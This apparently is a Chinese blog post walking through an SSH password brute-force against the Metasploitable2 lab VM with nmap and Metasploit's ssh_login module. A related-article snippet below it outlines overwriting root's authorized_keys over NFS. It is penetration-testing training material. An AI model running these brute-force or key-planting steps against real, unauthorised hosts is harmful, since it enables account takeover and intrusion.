Metasploitable2靶机之第二篇--ssh密码获取

最新推荐文章于 2025-04-07 09:45:35 发布

星球守护者

最新推荐文章于 2025-04-07 09:45:35 发布

阅读量1.4k

点赞数

分类专栏： Metasploit使用详解文章标签： Metasploitable2

本文链接：https://blog.csdn.net/qq_41901122/article/details/115407980

版权

Metasploit使用详解专栏收录该内容

22 篇文章

订阅专栏

文章目录

环境

主机	地址
Metasploitable2	192.168.232.202
kali-linux	192.168.232.129

主机ssh弱口令

第一步查看SSh端口是否开启

nmap –sV  -O 192.168.232.202

在这里插入图片描述

第二步选择漏洞库

search ssh
use auxiliary/scanner/ssh/ssh_login

在这里插入图片描述

第三步设置参数，开始攻击

set RHOSTS 192.168.160.131set USERNAME root
set PASS_FILE  pass.txt(字典文件，需要预先生成)
set THREADS 50
exploit

在这里插入图片描述

第四步利用成功，发现存在msfadmin

在这里插入图片描述

摘抄

我们还年轻，

长长的人生可以受一点风浪。

– 三毛

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

星球守护者

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

metasploitable2 渗透测试靶机 1

m0_73910867的博客

10-11

1919

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后，使用用户名：msfadmin 和密码msfadmin登陆适用于学习网络安全。

Metaspoitable2安全测试靶机の测试心得(上)

web_kids的博客

06-11

1013

无聊写的

参与评论您还未登录，请先登录后发表或查看评论

metasploitable2漏洞利用之ssh

u011250160的博客

04-22

1535

端口扫描信息搜集发现是openssh4.7p1 找来找去也没有什么可以直接获取shell的漏洞下面这个是枚举ssh用户名的脚本发现用户名 msf里的模块也可以爆破密码，不过相比之下，速度不如hydra 破解出了ssh的用户名和密码就可以去登录了在linux下直接命令行去连就行了在windows下需要一个客户端我这里用的是XShell 注意这里登录后的权限不是root 提权还不会，就先到这把 ...

利用Metasploit获取centos用户名和密码

weixin_33862188的博客

01-09

786

一、配置centos5.5服务器1、网卡配置设置网卡连接模式为nat2、网络配置Centos5.5的登录用户名和密码为root和123456（1）vi etc/sysconfig/network-scripts/ifcfg-eth0配置ip地址的方式如下：配置完成之后重启网络Service network restsart使用ifconfig查看网络配置即可二、开启SSH服务...

Metasploitable2靶机

最新发布

cjchsh的博客

04-07

1304

Metasploitable2靶机

kali3、nessus 针对 Metasploitable2-Linux VNC服务器“密码”密码

hzwindpower的博客

01-17

429

1、查看nessus报告 2、从nessus分析可得知，靶机的vnc开启以后，没有修改默认密码。利用kali自带的vncviewer去连接靶机。 3、输入密码：password 4、验证成功

如何用sqllab获取软大靶机管理密码

weixin_47346400的博客

09-10

314

打开sqlmab,填入目标网址

Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集4 ——基于SSH协议收集主机信息

天下著书立传者，皆为我师

05-09

865

实验内网渗透环境Metasploitable2-linux：靶机 192.168.234.8kali-debian：攻击机 192.168.234.141win7 虚拟机：靶机 192.168.234.158在此声明文章仅供相互学习参考，严禁利用于违法犯忌，任何事故自行承担！！

DC-1靶机渗透笔记

qq_60600840的博客

08-08

326

DC-1靶机、安全、渗透、靶机

渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具

墨鱼菜鸡

07-11

2630

操作系统：https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali：https://www.kali.org/get-kali/Parrot Security OS：Parrot Securitybackbox：ht...

metasploitable3渗透测试

qq_57976347的博客

06-06

510

1、攻击windows服务器漏洞用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描发现Windows服务器漏洞步骤： msfconsole---进入渗透模块 search manageengine-------搜索渗透模块 search reverse_http---------搜索http渗透模块 use exploit/windows/http/manageeine_connectionid_write---...

Metasploitable2靶机漏洞详解

12-11

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击。

Metasploitable 2攻击练习

唯以的博客

08-04

2211

Metasploitable2 Metasploitable2是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机,方便广大黑扩跟安全人员进行MSF漏洞测试跟学习,免去搭建各种测试环境。开放了很多的高危端口如21、23、445等，而且具有很多未打补丁的高危漏洞，如Samba MS-RPC Shell命令注入漏洞等，而且对外开放了很多服务，并且数据库允许外联等。系统中

渗透测试-Metasploitable2靶机

道阻且长，行则将至

02-22

8580

靶机介绍 Metasploit框架 Metasploit是一个开源的渗透测试框架软件，也是一个逐步发展为成熟的漏洞研究与渗透代码开发平台，此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示，Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是一个特别制作...

Linux__ssh服务开启_me

fangfengzhen115的专栏

11-19

709

linux安装ssh服务

metasploitable2--简介--漏洞利用

weixin_45018333的博客

03-16

7648

1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机，用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室，提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句：原来觉得搭建环境是很没有必要的，应该拿实际的网络去练习，但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建，太麻烦，但是现在忽然明白...

看完这篇教你玩转渗透测试靶机——Metasploitable2

热门推荐

Aluxian_的博客

03-09

3万+

Metasploitable2渗透测试详解Metasploitable2靶机介绍：Metasploitable2靶机下载：Metasploitable2靶机安装：Metasploitable2靶机漏洞详解： Metasploitable2靶机介绍： Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后，使用用户名：msfadmin 和密码msfadmin登陆 Metasploita

sqlmap对dvwa靶场的账号密码进行破解

m0_52934166的博客

05-16

1667

据此我们可猜测一下账号密码会在哪个表里（首先盲猜是在users表里，查看字段是找到账号密码的手段之一，一般账号字段为user,密码字段为password）后启动xampp,并启动xampp里的apache和mysql后面按钮start进行启动，当apache与mysql变成下图绿色后就行了。通过sqlmap继续查看dvwa库的所有表（可得guestbook表与users表）下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里。虚拟机搭建好后,相互ping能ping同就行。

Metasploitable2靶机学习

m0_46371267的博客

10-13

4440

Metasploitable2靶机渗透什么是Metasploitable2？ Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击。使用步骤下载地址：https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为：msfadmin 下载下来后直接双击网卡模式我默认为NAT模式(NAT模式与自己wifi同网段，使用kali时也要在同一网

metasploitable2靶机

12-31

### Metasploitable2 靶机概述 Metasploitable2 是一款专为安全研究人员设计的虚拟机镜像，旨在提供一个合法且可控环境来测试各种已知的安全漏洞和技术攻击手段[^1]。 ### 安装过程对于希望部署此靶场系统的用户而言，在本地环境中安装 VMware 或 VirtualBox 虚拟化平台是必要的前提条件之一。下载完成后解压文件并导入到所选虚拟化软件中即可完成初步设置工作。 ### 基础配置指南启动虚拟机之后，默认情况下会自动分配 IP 地址；如果遇到网络连接方面的问题，则可以尝试调整 VM 的网卡模式至桥接方式以获得更稳定的互联网访问体验。此外，建议开启 SSH 服务以便后续操作更加便捷高效： ```bash sudo service ssh start ``` 为了方便管理以及执行特定实验项目，还可以考虑更改默认管理员账户 `msfadmin` 的密码，增强安全性的同时也防止因误操作而导致不必要的麻烦发生: ```bash passwd msfadmin ``` ### 漏洞利用实例——NFS 权限提升由于 NFS (Network File System) 服务存在不当授权情况，使得 `/root/.ssh/authorized_keys` 文件能够被外部主机非法篡改，从而允许攻击者通过植入公钥的方式绕过身份验证机制实现免密登陆目标机器的目的。具体实施步骤如下所示： #### 获取目标系统开放端口列表使用 nmap 工具扫描远程服务器上的活动 TCP 端口号及其对应的服务名称： ```bash nmap -p- <target_ip> ``` #### 利用 Metasploit Framework 自动化工具包中的模块快速定位潜在风险点加载适用于当前场景下的 exploit 并按照提示逐步输入必要参数直至成功获取 shell 访问权限为止： ```ruby use auxiliary/scanner/nfs/nfs_showmount set RHOSTS <target_ip> run ``` 一旦确认了共享资源路径后就可以继续推进下一步计划了... #### 修改 authorized_keys 实现无密码登录借助 sftp 协议上传事先准备好的 id_rsa.pub 至指定位置覆盖原有内容，最终达到预期效果： ```bash sftp root@<target_ip>:/root/.ssh/ put ~/.ssh/id_rsa.pub /root/.ssh/authorized_keys exit ``` 此时再尝试重新建立新的 SSH 连接应该就不会弹出任何认证对话框而是直接进入命令行界面啦！

Metasploitable2靶机之第二篇--ssh密码获取

文章目录

环境

主机ssh弱口令

第一步 查看SSh端口是否开启

第二步 选择漏洞库

第三步 设置参数，开始攻击

第四步 利用成功，发现存在msfadmin

摘抄

第一步查看SSh端口是否开启

第二步选择漏洞库

第三步设置参数，开始攻击

第四步利用成功，发现存在msfadmin